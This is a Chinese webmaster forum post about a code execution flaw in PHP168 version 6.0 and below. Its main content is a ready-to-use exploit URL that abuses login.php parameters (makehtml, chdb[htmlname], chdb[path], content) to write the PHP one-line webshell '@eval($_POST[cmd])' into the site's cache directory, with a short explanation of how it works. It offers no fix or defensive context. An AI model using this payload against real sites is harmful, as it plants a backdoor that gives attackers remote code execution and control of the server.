推56論壇

 找回密碼
 立即注冊(限中文)

QQ登錄

只需一步,快速開始

    查看: 1519|回複: 0

    [php168教程] PHP168 6.0及以下版本login.php代碼執行

      [複制鏈接]
    發表于 2018-8-30 14:46:35 | 顯示全部樓層 |閱讀模式
    在其域名後加上這樣一段代碼:
    login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>。
    這段代碼 的意思利用login.php文件將
    <?php%20@eval($_POST[cmd]);?>
    這段代碼寫入到網站緩存目錄 cache的xx.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句話木馬的服務端。


    URL是
    http://www.xx.com/login.php?makehtml=1&chdb[htmlname]=xx.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>

    高級模式
    B Color Image Link Quote Code Smilies
    您需要登錄後才可以回帖 登錄 | 立即注冊(限中文)

    本版積分規則

    關閉

    推56站長論壇推薦上一條 /1 下一條

    站長QQ
    在線咨詢
    咨詢熱線
    QQ:405327411
    站長

    QQ|廣告合作|關于我們|聯系我們|免責聲明|網站導航|站長論壇 ( 豫ICP備11018337號-5 )

    豫公網安備 41172202000143號

    王寶臣旗下網站 推56論壇(www.lifenize.com)站長論壇 SEO論壇 網絡營銷論壇 新手站長論壇 網絡推廣論壇 站長社區 站長網

    Powered by Discuz! X3.4 Licensed

    ©2001-2013 Comsenz Inc.

    快速回複 返回頂部 返回列表